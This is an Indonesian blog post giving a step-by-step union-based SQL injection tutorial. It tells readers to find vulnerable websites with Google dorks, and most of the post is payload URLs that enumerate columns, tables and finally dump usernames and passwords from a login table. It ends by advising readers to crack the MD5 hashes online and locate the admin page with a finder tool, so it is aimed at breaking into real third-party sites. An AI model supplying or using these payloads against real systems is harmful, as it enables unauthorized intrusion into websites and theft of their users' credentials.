Kamis, 23 Januari 2014

Tutorial SQL Injection

Carilah Situs yang Vulner dengan menggunakan dork , untuk dork-nya bisa di search saja melalui om google .

 Langkah 1
http://www.example.com/index.php?id=3
Menjadi 
http://www.example.com/index.php?id=3'

Langkah 2
http://www.example.com/index.php?id=3 ORDER BY (number)--

Langkah 3
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

 Langkah 4
http://www.example.com/index.php?id=-3+UNION+SELECT+version(),2,3,4,5,6,7--

Langkah 5 
http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(table_name),2,3,4,5,6,7+
from+information_schema.tables where table_schema=database()--
Kemudian kita convert text yang di dapat ke hexa (tex to hex) :
Langkah 6
http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(column_name),2,3,4,5,6,7+
from+information_schema.columns where table_name=0x hasil convert hexa --
Langkah 7
http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(user,0x3a,password),2,3,4,5,6,7+
from+login--
Langkah 8
Setelah Mendapat user dan password barulah, masuk ke md5decryppter.com untuk decrypte password tersebut, kemudian kita mencari admin page-nya menggunakan tool, misalkan admin finder .
Selesai :D
Diposting oleh di Tidak ada komentar:
Langganan: Komentar (Atom)